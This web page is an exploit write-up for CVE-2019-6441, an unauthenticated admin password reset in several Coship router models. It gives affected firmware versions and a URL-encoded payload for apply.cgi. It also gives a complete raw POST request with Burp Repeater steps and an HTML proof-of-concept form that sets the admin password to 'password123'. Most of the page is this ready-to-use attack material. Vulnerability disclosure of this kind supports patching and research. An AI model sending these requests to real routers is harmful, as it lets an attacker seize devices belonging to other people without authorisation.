Coship Router Unauthenticated Admin Password Reset CVE-2019-6441

0
134

Nearly all the firmware versions of Coship routers are vulnerable for this attack. The vulnerability lies in the apply.cgi file of the firmware where it doesn’t check for the authentication headers.

So, by crafting a malicious POST request and sending it to the router, the attacker can change the Password of the admin user without requiring any admin credentials or admin interaction.

Exploit Details :

# Exploit Title: Coship Wireless Router – Unauthenticated Admin Password Reset
# Date: 15.01.2019
# Exploit Author: Adithyan AK
# Vendor Homepage: http://en.coship.com/
# Category: Hardware (Wifi Router)
# Version: 4.0.0.48
# Tested on: MacOS Mojave v.10.14
# CVE: CVE-2019-6441

Affected Versions :

    Coship RT3052 - 4.0.0.48
Coship RT3050 - 4.0.0.40
Coship WM3300 - 5.0.0.54
Coship WM3300 - 5.0.0.55
Coship RT7620 - 10.0.0.49 etc

Proof Of Concept :

  • URL: http://192.168.1.254 (Wifi Router Gateway)
  • Attack Vector : apply.cgi
  • Payload : page=regx%2Fmanagement%2Faccounts.asp&http_username=admin&http_passwd=password123&usr_confirm_password=password123&action=Submit

Reproduction Steps :

  • Find the router gateway address.
  • Open Burp Suite and browse to the repeater tab.
POST /apply.cgi HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 181
Connection: close
Upgrade-Insecure-Requests: 1
page=regx%2Fmanagement%2Faccounts.asp&http_username=admin&http_passwd=password123&usr_confirm_password=password123&action=Submit    
  • Copy paste the above request in burp repeater and change the X.X.X.X to your Router gateway address.
  • Set the target to router gateway address and port to 80 in Repeater tab.
  • Click on ‘Go’

The password of the admin will be changed as “password123

HTML POC :

<html>
  <!-- Change the X.X.X.X with the router's IP address -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://X.X.X.X/apply.cgi" method="POST">
      <input type="hidden" name="page" value="regx/management/accounts.asp" />
      <input type="hidden" name="http_username" value="admin" />
      <input type="hidden" name="http_passwd" value="password123" />
      <input type="hidden" name="usr_confirm_password" value="password123" />
      <input type="hidden" name="action" value="Submit" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
  • Change the X.X.X.X to Router Gateway address and Save the above code as Exploit.html
  • Open Exploit.html with your Browser
  • Click on “Submit request”

The password of the admin will now be changed to “password123

LEAVE A REPLY

Please enter your comment!
Please enter your name here

This site uses Akismet to reduce spam. Learn how your comment data is processed.